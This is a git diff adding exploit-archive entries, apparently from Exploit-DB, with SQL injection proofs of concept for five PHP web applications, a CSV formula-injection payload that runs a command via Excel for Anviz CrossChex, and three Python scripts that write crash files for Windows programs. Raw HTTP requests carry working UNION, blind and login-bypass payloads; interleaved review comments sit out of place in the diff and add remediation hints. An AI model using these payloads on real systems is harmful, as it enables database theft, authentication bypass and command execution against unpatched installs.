diff --git a/exploits/php/webapps/45763.txt b/exploits/php/webapps/45763.txt
new file mode 100644
index 000000000..9846df670
--- /dev/null
+++ b/exploits/php/webapps/45763.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Fantastic Blog CMS 1.0 - 'id' SQL Injection
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/ronald-ronniem/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Ronald%20Ronnie/fantasticblog_0.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/single.php?id=[SQL]
+#
+#[PATH]/single.php
+#....
+#04 $id=$_REQUEST['id']; $query="SELECT * from blogs where id='".$id."'"...........
+#05 $row = mysqli_fetch_assoc($result);
+#....
+GET /[PATH]/single.php?id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 01 Nov 2018 08:42:57 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/category.php?id=[SQL]
+#
+#[PATH]/category.php
+#....
+#04 $id=$_REQUEST['id']; $query="SELECT * from blog_categories where id='".$id."'"...........
+#05 $row = mysqli_fetch_assoc($result);?>
+#....
+GET /[PATH]/category.php?id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: __atuvc=1%7C44; __atuvs=5bd96b11114f485b000
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 01 Nov 2018 08:46:57 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45764.txt b/exploits/php/webapps/45764.txt
new file mode 100644
index 000000000..ae2c94782
--- /dev/null
+++ b/exploits/php/webapps/45764.txt
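Review bot: The entry quotes the vulnerable statement (line 04 of `single.php` and of `category.php`, where `$_REQUEST['id']` is concatenated into the SELECT) but does not record the remediation, which is what a maintainer of an affected install needs. I would add a comment under each code excerpt such as `# Fix: bind id through a prepared statement (mysqli_prepare / bind_param) and reject non-numeric values`. The captured responses are headers only and run straight on from the request with no separator line, so the record holds no evidence of what the server returned. The same applies to 45766.txt and 45768.txt in this commit.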
@@ -0,0 +1,34 @@
+# Exploit Title: Jelastic 5.4 - 'host' SQL injection
+# Google Dork: N/A
+# Date: [date]
+# Exploit Author: Procode701
+# Vendor Homepage: https://jelastic.com/
+# Software Link: https://jelastic.com/
+# Version: 5.4
+# Tested on: [Kali Linux]
+# CVE : N/A
+
+# POC:
+# The application /1.0/users/authentication/rest/signin is vulnerable to SQL injection.
+# Vulnerable application Header field: Host:' AND 8494=8494-- ttWV
+
+# EXPLOIT POC :
+# Parameter: Host #1* ((custom) HEADER)
+# Type: boolean-based blind
+# Payload:' AND 8494=8494-- ttWV
+# PAYLOAD: ' AND 8494=8494-- ttWV
+
+POST /1.0/users/authentication/rest/signin HTTP/1.1
+Host: localhost'-8564' OR 8495=8495-- yjRM--delay=0
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: */*
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: https://localhost
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Content-Length: 128
+Cookie: GLang=en; GLocale=en-us; jrouter=b916bf4d3b39e6029fd403f21566f3f1
+DNT: 1
+Connection: close
+
+charset=UTF-8&hx_lang=en&session=1&ruk=cccc5e05-c0cb-4419-8a34-tab606191&email=testing%40gg.com&password=testing&appid=dashboard
\ No newline at end of file
diff --git a/exploits/php/webapps/45766.txt b/exploits/php/webapps/45766.txt
new file mode 100644
index 000000000..db4e39c8a
--- /dev/null
+++ b/exploits/php/webapps/45766.txt
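Review bot: Two header fields still hold template placeholders, `# Date: [date]` and `# Tested on: [Kali Linux]`, and should be filled in before the entry is indexed. The Host value in the sample request does not match the payload documented in the comment block above it, and its trailing `--delay=0` reads like a tool option that leaked into the capture (inferred, not confirmed by the page), so a defender cannot tell which request was actually tested. The entry also gives no fixed version or vendor-notification status, and it is filed under php/webapps although nothing visible here shows that the affected endpoint is PHP.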
@@ -0,0 +1,39 @@
+# Exploit Title: Gate Pass Management System 2.1 - 'login' SQL Injection
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.livebms.com
+# Software Link: https://netcologne.dl.sourceforge.net/project/gatepass/gpms_Update.zip
+# Version: 2.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/login-exec.php
+#
+POST /[PATH]/login-exec.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=dfbpcp36b5ura1aurmtm3dqbr0
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 119
+login=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&Submit=Login
+HTTP/1.1 302 Found
+Date: Thu, 01 Nov 2018 12:08:54 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Set-Cookie: PHPSESSID=e7ed7dtjg0hq3qsv0vil80o086; path=/
+Location: gpms/index.php
+Content-Length: 281
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45767.txt b/exploits/php/webapps/45767.txt
new file mode 100644
index 000000000..8bdd181be
--- /dev/null
+++ b/exploits/php/webapps/45767.txt
@@ -0,0 +1,55 @@
+# Exploit Title: qdPM 9.1 - 'filter_by' SQL Injection
+# Date: 2018-11-01
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Contact: https://pentest.com.tr
+# Vendor Homepage: http://qdpm.net
+# Software Link: http://qdpm.net/download-qdpm-free-project-management
+# Version: v9.1
+# Category: Webapps
+# Tested on: XAMPP for Linux 5.6.38-0
+# Software description:
+# Free project management tool for small team
+# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
+# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact
+# using a Ticket System that is integrated into Task management.
+
+# Vulnerabilities:
+# The application accommodates 3 different vulnerabilities.
+# SQL Injection - Cross-Site Scripting and Denial of Service.
+
+# POC 1 : SQL Inection :
+# An attacker can gain access to all the database information using filter_by[CommentCreatedFrom]
+# and filter_by[5BCommentCreatedTo] parameters.
+
+# Parameter: filter_by[CommentCreatedFrom] and filter_by[5BCommentCreatedTo](POST)
+# Request URL: /index.php/timeReport
+
+# Type: boolean-based blind
+# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+# Payload:
+
+filter_by[CommentCreatedFrom]=2018-10-30") RLIKE (SELECT (CASE WHEN (7166=7166) THEN #0x323031382d31302d3330 ELSE 0x28 END)) AND ("votm"="votm&filter_by[CommentCreatedTo]=2018-10-17
+
+# Type: error-based
+# Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
+# Payload:
+
+filter_by[CommentCreatedFrom]=2018-10-30") AND EXTRACTVALUE(2944,CONCAT(0x5c,0x716a766b71,(SELECT #(ELT(2944=2944,1))),0x7178717871)) AND ("ilfY"="ilfY&filter_by[CommentCreatedTo]=2018-10-17
+
+# Type: stacked queries
+# Title: MySQL > 5.0.11 stacked queries (comment)
+# Payload:
+
+filter_by[CommentCreatedFrom]=2018-10-30");SELECT SLEEP(5)#&filter_by[CommentCreatedTo]=2018-10-17
+
+# Type: AND/OR time-based blind
+# Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
+# Payload:
+
+filter_by[CommentCreatedFrom]=2018-10-30") AND 2173=BENCHMARK(5000000,MD5(0x7652785a)) AND #("PRig"="PRig&filter_by[CommentCreatedTo]=2018-10-17
+
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 40 columns
+# Payload:
+
+filter_by[CommentCreatedFrom]=2018-10-30") UNION ALL SELECT #33,33,33,33,33,33,33,33,33,33,CONCAT(0x716a766b71,0x474b474f65666b437365466773655373776743495a75536670676f41445249514775775a6f4d6a63,0x7178717871),#33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33-- #pqmn&filter_by[CommentCreatedTo]=2018-10-17
\ No newline at end of file
diff --git a/exploits/php/webapps/45768.txt b/exploits/php/webapps/45768.txt
new file mode 100644
index 000000000..b3a7ab3cc
--- /dev/null
+++ b/exploits/php/webapps/45768.txt
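Review bot: The description announces three vulnerabilities (SQL Injection, Cross-Site Scripting and Denial of Service) but the file documents only `POC 1`, so either the other two need their own sections or the summary should say so, e.g. `# Only the SQL injection is documented in this entry`. The parameter is written `filter_by[5BCommentCreatedTo]` in the description and on the `# Parameter:` line but `filter_by[CommentCreatedTo]` in every payload; the `5B` looks like a leftover from URL-encoding. `SQL Inection` in the `# POC 1` heading is a typo. The entry also does not say whether `/index.php/timeReport` requires an authenticated session, which decides how defenders should prioritise it.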
@@ -0,0 +1,58 @@
+# Exploit Title: Yot CMS 3.3.1 - 'aid' SQL Injection
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://yot.sourceforge.io/
+# Software Link: https://ayera.dl.sourceforge.net/project/yot/Yot%203.3.1.zip
+# Version: 3.3.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/index.php?page=articles&op=art&aid=[SQL]
+#
+GET /[PATH]/index.php?page=articles&op=art&aid=1++uniON+SElEcT++++0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 01 Nov 2018 23:21:17 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/index.php?page=articles&op=cat&cid=[SQL]
+#
+GET /[PATH]/index.php?page=articles&op=cat&cid=1++uniON+SElEcT++++0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 01 Nov 2018 23:32:28 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/windows/local/45765.txt b/exploits/windows/local/45765.txt
new file mode 100644
index 000000000..bf884f028
--- /dev/null
+++ b/exploits/windows/local/45765.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Anviz AIM CrossChex Standard 4.3 - CSV Injection
+# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
+# Date: 2018-11-01
+# Vendor: Anviz Biometric Technology Co., Ltd.
+# Product web page: https://www.anviz.com
+# Affected version: 4.3.6.0
+# Tested on: Microsoft Windows 7 Professional SP1 (EN)
+# CVE: N/A
+# References
+# Advisory ID: ZSL-2018-5498
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php
+
+# Desc: CSV (XLS) Injection (Excel Macro Injection or Formula
+# Injection) exists in the AIM CrossChex 4.3 when importing
+# or exporting users using xls Excel file. This can be exploited
+# to execute arbitrary commands on the affected system via
+# SE attacks when an attacker inserts formula payload in the
+# 'Name' field when adding a user or using the custom fields
+# 'Gender', 'Position', 'Phone', 'Birthday', 'Employ Date'
+# and 'Address'. Upon importing, the application will launch
+# Excel program and execute the malicious macro formula.
+
+# PoC
+# From the menu:
+
+User -> Add -> use payload: =cmd|' /C mspaint'!L337
+User -> Import / Export: use payload: =cmd|' /C mspaint'!L337
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45769.py b/exploits/windows_x86-64/dos/45769.py
new file mode 100755
index 000000000..58933d68a
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45769.py
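Review bot: The description explains the formula injection but leaves out the mitigation, and the title gives the version as 4.3 while `# Affected version:` says 4.3.6.0. I would add `# Mitigation: on export, prefix any cell starting with =, +, - or @ with a single quote; keep DDE and automatic link updates disabled in Excel`. The phrase `malicious macro formula` is also imprecise, since the payload shown is a DDE-style formula rather than a VBA macro; `malicious formula` would be accurate.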
@@ -0,0 +1,28 @@
+# Exploit Title: WinMTR 0.91 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://winmtr.net
+# Software Link: http://winmtr.net/winmtr_download/
+# Version: 0.91
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# Host: Payload
+
+#!/usr/bin/python
+
+buffer = "A" * 238
+
+payload = buffer
+try:
+ f=open("exp.txt","w")
+ print "[+] Creating %s bytes evil payload." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created."
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45770.py b/exploits/windows_x86-64/dos/45770.py
new file mode 100755
index 000000000..0d230ed42
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45770.py
@@ -0,0 +1,28 @@
+# Exploit Title: CdCatalog 2.3.1 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://cdcat.sourceforge.net
+# Software Link: https://netcologne.dl.sourceforge.net/project/cdcat/cdcat/cdcat-2.3.1/cdcat-2.3.1.tar.bz2
+# Version: 2.3.1
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# CTRL+O & File/Open/exp.hcf
+
+#!/usr/bin/python
+
+buffer = "A" * 21
+
+payload = buffer
+try:
+ f=open("exp.hcf","w")
+ print "[+] Creating %s bytes evil payload." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created."
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45772.py b/exploits/windows_x86-64/dos/45772.py
new file mode 100755
index 000000000..ff91eef57
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45772.py
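Review bot: `#!/usr/bin/python` sits on line 16 of 45769.py, after the comment header, so it is not a shebang and the 100755 mode has no interpreter line to go with it; it belongs on line 1. The `try` block uses a bare `except:` and closes the file by hand, so any error is reported as `File cannot be created.` and the handle is left open if `write` fails; `with open("exp.txt", "w") as f:` together with `except IOError:` is the usual form. The entry also records no crash detail (exception code or faulting module), which is what a defender needs to tell a plain hang from memory corruption. 45770.py and 45772.py in this commit are the same script and share all three points.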
@@ -0,0 +1,28 @@
+# Exploit Title: Zint Barcode Generator 2.6 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.zint.org.uk
+# Software Link: https://sourceforge.net/projects/zint/files/latest/download
+# Version: 2.6
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# Add 2D Component / 2D Component Data
+
+#!/usr/bin/python
+
+buffer = "A" * 44450
+
+payload = buffer
+try:
+ f=open("exp.txt","w")
+ print "[+] Creating %s bytes evil payload." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created."
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index dc9381b99..5bc4341c9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6172,6 +6172,9 @@ id,file,description,date,author,type,platform,port
 45760,exploits/windows_x86-64/dos/45760.py,"Artha The Open Thesaurus 1.0.3.0 - Denial of Service (PoC)",2018-11-01,"Ihsan Sencan",dos,windows_x86-64,
 45761,exploits/windows_x86-64/dos/45761.py,"WebDrive 18.00.5057 - Denial of Service (PoC)",2018-11-01,"Victor Mondragón",dos,windows_x86-64,
 45762,exploits/windows_x86/dos/45762.py,"Arm Whois 3.11 - Denial of Service (PoC)",2018-11-01,"Yair Rodríguez Aparicio",dos,windows_x86,
+45769,exploits/windows_x86-64/dos/45769.py,"WinMTR 0.91 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
+45770,exploits/windows_x86-64/dos/45770.py,"CdCatalog 2.3.1 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
+45772,exploits/windows_x86-64/dos/45772.py,"Zint Barcode Generator 2.6 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10073,6 +10076,7 @@ id,file,description,date,author,type,platform,port
 45738,exploits/windows/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows,
 45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd,
 45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows,
+45765,exploits/windows/local/45765.txt,"Anviz AIM CrossChex Standard 4.3 - CSV Injection",2018-11-02,LiquidWorm,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40272,3 +40276,8 @@ id,file,description,date,author,type,platform,port
 45756,exploits/php/webapps/45756.txt,"Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
 45757,exploits/php/webapps/45757.txt,"CI User Login and Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
 45758,exploits/php/webapps/45758.py,"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution",2018-10-31,"Jakub Palaczynski",webapps,php,
+45763,exploits/php/webapps/45763.txt,"Fantastic Blog CMS 1.0 - 'id' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80
+45764,exploits/php/webapps/45764.txt,"Jelastic 5.4 - 'host' SQL Injection",2018-11-02,Procode701,webapps,php,80
+45766,exploits/php/webapps/45766.txt,"Gate Pass Management System 2.1 - 'login' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80
+45767,exploits/php/webapps/45767.txt,"qdPM 9.1 - 'filter_by' SQL Injection",2018-11-02,AkkuS,webapps,php,80
+45768,exploits/php/webapps/45768.txt,"Yot CMS 3.3.1 - 'aid' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80